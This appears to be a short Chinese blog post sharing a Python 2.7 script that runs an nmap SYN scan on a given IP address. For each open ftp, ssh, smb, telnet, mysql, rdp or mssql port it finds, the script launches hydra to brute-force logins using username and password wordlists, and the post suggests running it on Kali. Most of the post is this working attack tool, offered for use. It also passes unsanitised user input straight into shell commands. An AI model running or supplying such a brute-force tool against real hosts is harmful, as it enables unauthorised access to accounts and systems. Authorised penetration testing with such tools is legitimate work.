为了方便对端口对应服务进行弱口令的爆破。使用python将nmap和hydra进行结合。。
代码:
#coding=utf-8
#python2.7
import os
import re
ip=raw_input("请输入IP地址:")
servers=['ftp','ssh','smb','telnet','mysql','rdp','mssql']
def weak(ip):
os.system('nmap -sS -v -n -T4 %s -oN result.txt' % ip)
with open('result.txt','r') as f:
line=f.read().replace(' ','')
pattern=re.compile(r'.*/tcpopen.*')
keyword=pattern.findall(line)
#print keyword
hydra(keyword)
def hydra(keyword):
for k in keyword:
i=k.find('open')
server=k[i+4:]
if server in servers:
print "\033[1;31;40m===>hydra start brute %s ====>\033[0m" % server
os.system('hydra -L user.txt -P word.txt -t 4 %s://%s ' % (server,ip))
if server=="ms-wbt-server":
print "\033[1;31;40m===> hydra start brute rdp server ====>\033[0m"
os.system('hydra -L user.txt -P word.txt -t 4 rdp://%s ' % ip)
else:
pass
if __name__ == '__main__':
weak(ip)
格式为:
weak.py
因为kali有线程的nmap、hydra工具。直接放置在kali进行运行。
网友评论